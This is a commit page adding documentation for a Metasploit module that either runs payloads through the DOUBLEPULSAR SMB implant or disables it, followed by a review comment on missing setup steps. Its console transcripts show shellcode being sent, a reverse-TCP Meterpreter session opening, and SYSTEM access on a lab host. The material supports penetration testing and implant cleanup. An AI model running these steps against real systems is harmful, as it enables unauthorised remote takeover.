Land #12374, Add DOUBLEPULSAR payload execution and neutralization module
busterb committed Oct 1, 2019
2 parents b223e5e + a1d1303 commit f3c8037
Showing 2 changed files with 478 additions and 0 deletions.
94 changes: 94 additions & 0 deletions documentation/modules/exploit/windows/smb/doublepulsar_rce.md
@@ -0,0 +1,94 @@
## Introduction

This module executes a Metasploit payload against the Equation Group's
DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.

While this module primarily performs code execution against the implant,
the `Neutralize implant` target allows you to disable the implant.

## Targets

```
Id Name
-- ----
0 Execute payload
1 Neutralize implant
```

## Options

**DefangedMode**

Set this to `false` to disable defanged mode and enable module
functionality. Set this only if you're SURE you want to proceed.

**ProcessName**

Set this to the userland process you want to inject the payload into.
Defaults to `spoolsv.exe`.

## Usage

Pinging the implant:

```
msf5 exploit(windows/smb/doublepulsar_rce) > check
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[+] 192.168.56.115:445 - The target is vulnerable.
msf5 exploit(windows/smb/doublepulsar_rce) >
```

Executing a payload:

```
msf5 exploit(windows/smb/doublepulsar_rce) > set target Execute\ payload
target => Execute payload
msf5 exploit(windows/smb/doublepulsar_rce) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[*] 192.168.56.115:445 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
[*] 192.168.56.115:445 - Total shellcode length: 4096 bytes
[*] 192.168.56.115:445 - Encrypting shellcode with XOR key 0x33C6DC64
[*] 192.168.56.115:445 - Sending shellcode to DOUBLEPULSAR
[+] 192.168.56.115:445 - Payload execution successful
[*] Sending stage (206403 bytes) to 192.168.56.115
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.115:49158) at 2019-09-25 18:26:47 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-S7TDBIENPVM
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter >
```

Neutralizing the implant:

```
msf5 exploit(windows/smb/doublepulsar_rce) > set target Neutralize\ implant
target => Neutralize implant
msf5 exploit(windows/smb/doublepulsar_rce) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[*] 192.168.56.115:445 - Neutralizing DOUBLEPULSAR
[+] 192.168.56.115:445 - Implant neutralization successful
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/doublepulsar_rce) >
```
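Review bot: the Usage transcripts never show the step the Options section says is mandatory: `DefangedMode` must be set to `false` before the module does anything, yet all three examples go straight from the prompt to `check` or `run`. Add a `set DefangedMode false` line (plus the `set RHOSTS` and `set payload` lines the transcripts imply) ahead of the first example so a reader can reproduce them, and say what `check` reports while the module is still defanged, since that is the state a cautious operator will try first. The "Neutralizing the implant" transcript also shows `Started reverse TCP handler on 192.168.56.1:4444` even though that target ends with "no session was created"; either document that a payload and handler are still required for the neutralize target or note that they are unused, otherwise the output reads as a stray listener left running.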